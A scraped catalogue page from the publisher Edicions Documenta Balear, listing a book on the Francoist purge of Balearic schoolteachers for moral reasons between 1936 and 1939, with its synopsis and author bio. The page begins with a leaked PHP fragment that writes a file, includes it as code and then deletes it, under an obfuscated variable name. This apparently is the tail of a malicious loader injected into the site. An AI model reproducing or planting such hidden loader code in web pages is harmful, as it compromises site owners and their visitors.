");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - La depuració de mestres balears per motius morals (1936-1939)
Cercador d'Obres
ORDENAR:
Començar recerca

La depuració de mestres balears per motius morals (1936-1939)

Tur Balaguer, Francesc

Col·lecció:
Papers
Tema:
Història contemporània
Pàgines:
80
PVP:
11.00
ISBN:
978-84-16163-88-5
Data d'Edició:
31/03/2017
El procés de depuració franquista contra els docents balears.
Sinopsi
El triomf del cop d’estat del juliol del 1936 va suposar la fi de la legalitat de la Segona República a Mallorca i les Pitiüses, i va implicar la persecució de les persones que es consideraven desafectes, entre les quals destacaven els docents. Aquest llibre descriu el procés de depuració franquista del magisteri balear per motius morals.


L’autor recorre la història dels projectes educatius més renovadors a les Illes des del final del segle XIX fins a l’obra educativa de la República amb l’hostilitat de l’Església més tradicional i conservadora. Finalment, el llibre se centra en la depuració per actituds morals i en l’establiment de l’ensenyament confessional catòlic.


Llegiu el Sumari.


Francesc Tur Balaguer
(Palma, 1965) és graduat en Humanitats per la Universitat Oberta de Catalunya i estudis en Geografia, Història i Història de l’Art per la Universitat de les Illes Balears i és autor de diversos estudis sobre la Guerra de Successió a la corona hispànica, la Segona República i la Guerra Civil.Recomanar
Comentar
Comentaris (0)